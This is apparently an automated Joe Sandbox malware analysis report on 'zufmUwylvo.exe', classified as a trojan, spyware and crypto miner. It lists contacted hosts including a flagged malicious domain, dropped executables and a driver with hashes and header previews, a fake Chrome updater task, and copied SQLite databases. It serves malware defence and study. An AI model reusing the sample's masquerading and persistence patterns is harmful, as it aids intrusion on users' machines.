http://crt.rootca1.amazontrust.com/rootca1.cer0?	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/Pester/PesterXzu	powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmp	false
http://icanhazip.com	zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE8B000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmp	false
https://aka.ms/pscore68	powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D9181000.00000004.00000800.00020000.00000000.sdmp	false
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false
https://gemini.google.com/app?q=	zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
89.23.100.233	unknown	Russian Federation	48687	MAXITEL-ASRU	false
104.16.184.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
84.32.84.151	utka.xyz	Lithuania	33922	NTT-LT-ASLT	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1530000
Start date and time:	2024-10-09 16:27:49 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	18
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zufmUwylvo.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@72/47@3/3
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 75 Number of non-executed functions: 194
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, pool.hashvault.pro, nexusrules.officeapps.live.com, pastebin.com
Execution Graph export aborted for target powershell.exe, PID 8508 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: zufmUwylvo.exe

Simulations

Behavior and APIs

Time	Type	Description
10:29:54	API Interceptor	1x Sleep call for process: zxcvbnmasd.exe modified
10:29:55	API Interceptor	51x Sleep call for process: powershell.exe modified
10:30:05	API Interceptor	99x Sleep call for process: zufmUwylvo.exe modified
10:30:08	API Interceptor	1x Sleep call for process: updater.exe modified
10:30:30	API Interceptor	243936x Sleep call for process: winlogon.exe modified
10:30:31	API Interceptor	250234x Sleep call for process: lsass.exe modified
10:30:31	API Interceptor	1323039x Sleep call for process: svchost.exe modified
10:30:35	API Interceptor	191052x Sleep call for process: dwm.exe modified
10:30:38	API Interceptor	136574x Sleep call for process: IntelCpHDCPSvc.exe modified
10:30:42	API Interceptor	134836x Sleep call for process: IntelCpHeciSvc.exe modified
10:30:43	API Interceptor	73356x Sleep call for process: igfxCUIService.exe modified
16:30:01	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

Process:	C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	20970496
Entropy (8bit):	7.80864463332949
Encrypted:	false
SSDEEP:	393216:mE0t6YZQ+hEO1CGk9rNVdXlTvr6EaYOHLfwS1hQeJpsQ:mttRQSYGk9rhh6aQfwQhQ
MD5:	413E4E7BC129E8165D1FFD2B1AE5DB04
SHA1:	1EA09F97D200319F1582AEB8F4084D80B0D61DFA
SHA-256:	B388D2B53453ADD11982A0E5B86EE01BBAF318EE77483300731D2202CE906146
SHA-512:	FB37421F14D673587DF501051C1DE9E36C4DF07B5871AF391E71A6269E5E42BCE70CC7841C6E55D0383871248A4DC520C9DEB1B9E4CFAB4C86BB6C1C21F89DEE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f........../....&.....\[..&..R.]........@..............................@.....R.@... ... ..............................................4^.<.....@..... .@..;..............................................(....................... ............................text... ...........................`..`.data....,Y.........................@....rdata...>....Z.....................@..@.pdata.......0[.....................@..@.xdata..@....P[.....................@..@.bss.....%...`[..........................idata..4.....[.....................@....CRT....`.....[.....................@....tls..........[.....................@....yuZ..........[.....................@..@.e;T....N.....[..................... ..`."Ki....X...........................@.....>f......?.......?.................`..h.rsrc.........@.......?.............@..@................................................

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zufmUwylvo.exe.log

Download File

Process:	C:\Users\user\Desktop\zufmUwylvo.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1588
Entropy (8bit):	5.354257575749257
Encrypted:	false
SSDEEP:	48:MxHK81qHG6LCYHKGroPtHTyehAHKKtHjJHUHK8O:iq8wm8CYqGroPtzLeqKt10q8O
MD5:	2A1BF5624EA172E038D1D1C24A953C42
SHA1:	52DC46F3119F912CA24C5F099C45D83FFA1BF827
SHA-256:	7B5903AB75F339D105660606864080270038A0E1F3387361869A6320BC2E080C
SHA-512:	C663CD2292854B6BB9652CD409E54DBC1872252C1CEB85A15C6C00836579A651897AAAC494BAF1488F90BA15705BB2161DD51C7E1806796E971966E3ACA89F95
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\372e9962a41f186f070f1cb9f93273ee\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\d4da288bf6ac86ce3921b8db5eaed5be\System.Drawing.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\dbf675a2e7564fd29ec8b82b29a1a2fe\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\053d057c90af827d0929a6aba7feabcf\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rgbvhhk.d5v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vujfqkf.bxw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvpdge3o.2vt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogtzzszs.oek.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkmeltcf.txm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whp5elbz.ddo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzss34g2.dvl.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4lm1jdd.423.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	150528
Entropy (8bit):	5.769203996328619
Encrypted:	false
SSDEEP:	3072:60gp4UGo8MYmB99SrtM0ieiG027bAM8mMu0cM:60c4kzOieR02s
MD5:	658AC2968AC81EADBE165CFD2A770C34
SHA1:	39D228C2B5D1181ABE8BCE6A95FE852C8E06A79C
SHA-256:	4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
SHA-512:	CAF647E30FB73FE25E879A83C38D24B9E2453754DABBB3B2C7E885B814C9C06053206CBAAE777061C3873FC687DE5F15FAC5058B8B675C57235CFCCC2277A106
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$............qgL.qgL.qgL..aM.qgL..fM.qgL.qfL.qgLO.oM.qgLO..L.qgLO.eM.qgLRich.qgL........................PE..d.....[c.........."...... ...*.......#.........@..........................................`..................................................8.......p..`....`..8....................5..8............................................0...............................text...%........ .................. ..`.rdata.......0.......$..............@..@.data........P......................@....pdata..8....`.......8..............@..@.rsrc...`....p.......:..............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2F6D.tmp.dat

Download File

Process:	C:\Users\user\Desktop\zufmUwylvo.exe
File Type:	SQLite 3.x database, user version 77, last written using SQLite version 3045002, page size 32768, writer version 2, read version 2, file counter 3, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.04195199897834991
Encrypted:	false
SSDEEP:	192:alcnAVh3MQsX2Ptp1wbKevO6M96nSPhR3fFaA6IMiBJV:alcnAPdsX2PtpCuXj6GX3cASu
MD5:	4220F8B5379D9A1CB29D88395F5080E8
SHA1:	731D28CB85F7C1C9DBA95C4A4E4B7BA7930268A4
SHA-256:	02D4577FECBAAE00E7A2C867F88A694F168A98FCF3153DE39108E1E0669D5401
SHA-512:	3B4205605B32BC182347EEF784C30E86760C902F711B7936854398FFA8599C1A86C462D7CE779AA83EE40C43306E650E92285CAE49D84B02DDDFEAE32D9563CA
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................M..................................v.....-a>.~...\|0{.{Zz.z.y.y.y.x.w.v.vvu.t.u.s.r.sAr0q.q.p.p.o@o.n.nLmrn.lHk.j{i.ijfEe.d.c.d.c@b.b'a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2F6E.tmp.dat

Download File

Process:	C:\Users\user\Desktop\zufmUwylvo.exe
File Type:	SQLite 3.x database, user version 13, last written using SQLite version 3045002, page size 32768, writer version 2, read version 2, file counter 4, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	0.027515372941387128
Encrypted:	false
SSDEEP:	24:D43S232mNVpP965RayKN0MG/lTUlRt6wWUlkcObl:DoS6rh9WTKlRswRlkf
MD5:	21C347A9181FE59AEAE85D756BA9354F
SHA1:	E774CBE8A1F814DE978A7071A31EDCBB6E08663E
SHA-256:	1A227EBBCD4D6AD950DBBD94142CAB32E8998E1B8812E6CCFE1BCAA3C5F8673A
SHA-512:	B950CEB3FDA3B72FF2807878633DBDCA087990252B957F410083C3F1A1C0CF4D9EACDA2294C385293A759469FAEAE1B834A9973BA3B35108A3F9ACB9527FFD0B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................v......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe

Download File

Process:	C:\Users\user\Desktop\zufmUwylvo.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	20970496
Entropy (8bit):	7.80864463332949
Encrypted:	false
SSDEEP:	393216:mE0t6YZQ+hEO1CGk9rNVdXlTvr6EaYOHLfwS1hQeJpsQ:mttRQSYGk9rhh6aQfwQhQ
MD5:	413E4E7BC129E8165D1FFD2B1AE5DB04
SHA1:	1EA09F97D200319F1582AEB8F4084D80B0D61DFA
SHA-256:	B388D2B53453ADD11982A0E5B86EE01BBAF318EE77483300731D2202CE906146
SHA-512:	FB37421F14D673587DF501051C1DE9E36C4DF07B5871AF391E71A6269E5E42BCE70CC7841C6E55D0383871248A4DC520C9DEB1B9E4CFAB4C86BB6C1C21F89DEE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f........../....&.....\[..&..R.]........@..............................@.....R.@... ... ..............................................4^.<.....@..... .@..;..............................................(....................... ............................text... ...........................`..`.data....,Y.........................@....rdata...>....Z.....................@..@.pdata.......0[.....................@..@.xdata..@....P[.....................@..@.bss.....%...`[..........................idata..4.....[.....................@....CRT....`.....[.....................@....tls..........[.....................@....yuZ..........[.....................@..@.e;T....N.....[..................... ..`."Ki....X...........................@.....>f......?.......?.................`..h.rsrc.........@.......?.............@..@................................................

C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	4680
Entropy (8bit):	3.7114336397693255
Encrypted:	false
SSDEEP:	96:pYMguQII4iw6h4aGdinipV9ll7UY5HAmzQ+:9A4A/xne7HO+
MD5:	F87A9A2A3587DA7AA56390C7445929FD
SHA1:	AEEA03A63DE4AB25617734539505560D659C8DA9
SHA-256:	D238D326BEE7205CA8F242104AA7E8DE449EB15030097656D810ABB9142FEDA2
SHA-512:	329B5AC778BA44190606EA71F54407D0344E6B9E3E4B283DAA3F26B1D2A8F7FAED103D23E7ABDA05586D1FC4F0F338AD9AD3FBD7E6A4E1B5F9B6D15E0C19C842
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Windows\System32\winevt\Logs\Application.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	2392
Entropy (8bit):	3.683052602443591
Encrypted:	false
SSDEEP:	48:MUt4srP+sXCrPwfFRVEfWb3/OoNLnyTL3WI:nWOCrup/vOoN6LGI
MD5:	E0B94D021546D9C2D2569135701BA341
SHA1:	B8816B4ECC03C1196D100FD172A2B4EA083AEBDB
SHA-256:	22D1F9B75BFF02784E3D1D33B1CFA2FA9581E9C8FA35E55A60AC791B090529DB
SHA-512:	6F8ECC400A47B9F50E6AD379FD527E7BDD30B4BC1432D06B8BEFC8D212045B6E46E6BA6AA0CDDD004F326FB5F7AA588F532A0BE0D5E8E6029BA92188402DAE4C
Malicious:	false
Reputation:	unknown
Preview:	ElfChnk.................W.......W...............X.....;.....................................................................E.v.............................................=...........................................................................................................................g...............@...........................n...................M...]...........................h.......................&...............................................................................................**..X...W..........W...........AO&.........AO...]}....RU........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Z............{..P.r.o.v.i.d.e.r...7...F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.S.P.P.F........)...G.u.i.d.....&.{.E.2.3.B.3.3.B.0.-.C.8.C.9.-.4.7.2.C.-.A.5.F.9.-.F.2.B.D.F.E.

C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.267757496589592
Encrypted:	false
SSDEEP:	384:S8hv3FV/EB7N+W8wi3WzWxFyJOrXs8a0NR0HCl3ToXLpuRrepf:7R87N+twisIrXs8a0NR0i1ToXerepf
MD5:	5B63277E9724257670612BBB56348485
SHA1:	61351291C2570EC1C87142932C88050C6448BB4D
SHA-256:	285519EB88AD4F6DA66D770268661E19CAAB24A9B27F8F06F63124C13A8C61C0
SHA-512:	4563BFD9F1D93D4E0EFE6A7EFE5C5153AF9B4617C62EAC0B0D0794FA2C8B6706B87C930E8F7939C7F0634E9DC15E598E8F75740141E607D4EBD1F696072DFE10
Malicious:	false
Reputation:	unknown
